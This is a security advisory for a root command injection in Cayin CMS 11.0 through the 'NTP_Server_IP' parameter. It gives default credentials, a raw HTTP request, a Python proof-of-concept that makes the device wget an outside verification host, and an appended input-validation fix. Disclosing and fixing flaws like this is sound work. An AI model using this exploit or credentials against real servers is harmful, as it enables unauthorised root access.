# Title: Cayin Content Management Server 11.0 - Remote Command Injection (root)
# Author: LiquidWorm
# Date: 2020-06-04
# Vendor: https://www.cayintech.com
# CVE: N/A

Cayin Content Management Server 11.0 Root Remote Command Injection

Vendor: CAYIN Technology Co., Ltd.
Product web page: https://www.cayintech.com

Affected version: CMS-SE v11.0 Build 19179
                  CMS-SE v11.0 Build 19025
                  CMS-SE v11.0 Build 18325
                  CMS Station (CMS-SE-LXC)
                  CMS-60 v11.0 Build 19025
                  CMS-40 v9.0 Build 14197
                  CMS-40 v9.0 Build 14099
                  CMS-40 v9.0 Build 14093
                  CMS-20 v9.0 Build 14197
                  CMS-20 v9.0 Build 14092
                  CMS v8.2 Build 12199
                  CMS v8.0 Build 11175
                  CMS v7.5 Build 11175

Summary: CAYIN Technology provides Digital Signage solutions, including media
players, servers, and software designed for the DOOH (Digital Out-of-home)
networks. We develop industrial-grade digital signage appliances and tailored
services so you don't have to do the hard work.

Desc: CAYIN CMS suffers from an authenticated OS semi-blind command injection
vulnerability using default credentials. This can be exploited to inject and
execute arbitrary shell commands as the root user through the 'NTP_Server_IP'
HTTP POST parameter in the system.cgi page.

Tested on: Apache/1.3.42 (Unix)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2020-5570
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5570.php

15.05.2020

---

Session created with default credentials (webadmin:bctvadmin).
HTTP POST Request:
-----------------

POST /cgi-bin/system.cgi HTTP/1.1
Host: 192.168.1.3
Content-Length: 201
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Smith
Origin: http://192.168.1.3
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.3/cgi-bin/system.cgi
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cy_lang=ZH_TW; cy_us=67176fd7d3d05812008; cy_en=c8bef8607e54c99059cc6a36da982f9c009; WEB_STR_RC_MGR=RC_MGR_WEB_PLAYLIST; WEB_STR_SYSTEM=SYSTEM_SETTING; cy_cgi_tp=1591206269_15957
Connection: close

save_system: 1
system_date: 2020/5/1606:36:48
TIMEZONE: 49
NTP_Service: 1
NTP_Server_IP: $(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk)
TEST_NTP: 測試
reboot1: 1
reboot_sel1: 4
reboot_sel2: 1
reboot_sel3: 1
font_list: ZH_TW

Request recorder @ ZSL:
-----------------------

Origin of HTTP request: 192.168.1.3:61347

HTTP GET request to vrfy.zeroscience.mk:

GET / HTTP/1.0
User-Agent: MyVoiceIsMyPassportVerifyMe
Host: vrfy.zeroscience.mk
Accept: */*
Connection: Keep-Alive

PoC script:
-----------

import requests

url = "http://192.168.1.3:80/cgi-bin/system.cgi"

# Session cookies obtained after logging in with the default credentials
cookies = {"cy_lang": "ZH_TW",
           "cy_us": "67176fd7d3d05812008",
           "cy_en": "c8bef8607e54c99059cc6a36da982f9c009",
           "WEB_STR_RC_MGR": "RC_MGR_WEB_PLAYLIST",
           "WEB_STR_SYSTEM": "SYSTEM_SETTING",
           "cy_cgi_tp": "1591206269_15957"}

headers = {"Cache-Control": "max-age=0",
           "Origin": "http://192.168.1.3",
           "Content-Type": "application/x-www-form-urlencoded",
           "User-Agent": "Smith",
           "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
           "Referer": "http://192.168.1.3/cgi-bin/system.cgi",
           "Accept-Encoding": "gzip, deflate",
           "Accept-Language": "en-US,en;q=0.9",
           "Connection": "close"}

# Form fields of the system settings page; NTP_Server_IP carries the injected command
data = {"save_system": "1",
        "system_date": "2020/5/1606:36:48",
        "TIMEZONE": "49",
        "NTP_Service": "1",
        "NTP_Server_IP": "$(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk)",  # `cmd` or &cmd&
        "TEST_NTP": "\xe6\xb8\xac\xe8\xa9\xa6",
        "reboot1": "1",
        "reboot_sel1": "4",
        "reboot_sel2": "1",
        "reboot_sel3": "1",
        "font_list": "ZH_TW"}

requests.post(url, headers=headers, cookies=cookies, data=data)
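As an added illustration, not part of the advisory and not CAYIN's code, of the server-side fix the Desc section implies: the 'NTP_Server_IP' value is accepted only as an IPv4 address or an RFC 1123 hostname, and the time-sync command is built as an argv list rather than interpolated into a shell string, so the $(...) payload shown above is rejected before any process is spawned. The ntpdate invocation and the handler names are assumptions.

```python
import re
import subprocess
from typing import List

# Hypothetical hardened handler for the NTP_Server_IP form field (assumption:
# the original CGI builds a shell command from this value; here it never does).

# One DNS label: 1-63 chars of [A-Za-z0-9-], not starting or ending with '-'
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_ntp_server(value: str) -> bool:
    """Return True only for a dotted-quad IPv4 address or an RFC 1123 hostname."""
    if not value or len(value) > 253:
        return False
    parts = value.split(".")
    # IPv4: exactly four numeric octets in 0..255
    if len(parts) == 4 and all(p.isdigit() for p in parts):
        return all(0 <= int(p) <= 255 for p in parts)
    # Hostname: every dot-separated label must match the strict label pattern;
    # shell metacharacters ($ ( ) ` ; & space) can never pass this check.
    return all(_LABEL.match(label) for label in value.rstrip(".").split("."))


def build_ntp_sync_argv(value: str) -> List[str]:
    """Build the argv list for the sync command, refusing anything not validated."""
    if not is_valid_ntp_server(value):
        raise ValueError("rejected NTP_Server_IP: %r" % value)
    # Assumption: ntpdate is the sync tool; the value is one argv element, not shell text
    return ["ntpdate", "-u", value]


def run_ntp_sync(value: str) -> int:
    """Validate and run the sync; shell=False means $(...) is just literal bytes."""
    argv = build_ntp_sync_argv(value)
    return subprocess.run(argv, check=False).returncode


# Constructed sample inputs: the advisory's payload and two legitimate values
if __name__ == "__main__":
    for candidate in ["pool.ntp.org",
                      "192.168.1.1",
                      "$(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk)"]:
        print(candidate, "->", "accepted" if is_valid_ntp_server(candidate) else "rejected")
```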